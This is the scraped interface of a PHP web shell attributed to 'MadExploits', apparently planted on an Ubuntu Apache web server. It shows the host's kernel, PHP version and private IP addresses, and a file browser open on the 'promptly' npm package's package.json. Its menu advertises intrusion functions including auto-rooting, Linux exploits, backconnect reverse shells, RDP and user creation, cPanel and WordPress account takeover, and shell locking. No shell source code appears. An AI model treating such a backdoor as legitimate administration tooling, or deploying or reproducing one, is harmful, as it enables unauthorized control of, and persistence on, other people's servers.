Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
promptly /
[ HOME SHELL ]
Name
Size
Permission
Action
test
[ DIR ]
drwxrwxr-x
.editorconfig
220
B
-rw-rw-r--
.jshintrc
1.14
KB
-rw-rw-r--
.npmignore
27
B
-rw-rw-r--
.travis.yml
62
B
-rw-rw-r--
LICENSE
1.03
KB
-rw-rw-r--
README.md
4.62
KB
-rw-rw-r--
index.js
4.58
KB
-rw-rw-r--
package.json
700
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "promptly", "version": "2.2.0", "description": "Simple command line prompting utility", "main": "index.js", "dependencies": { "read": "^1.0.4" }, "devDependencies": { "async": "^2.0.0", "expect.js": "^0.3.1", "mocha": "^3.0.2" }, "scripts": { "test": "mocha --bail" }, "repository": { "type": "git", "url": "git://github.com/IndigoUnited/node-promptly" }, "bugs": { "url": "http://github.com/IndigoUnited/node-promptly/issues" }, "keywords": [ "prompt", "choose", "choice", "cli", "command", "line" ], "author": "IndigoUnited <hello@indigounited.com> (http://indigounited.com)", "license": "MIT" }
Close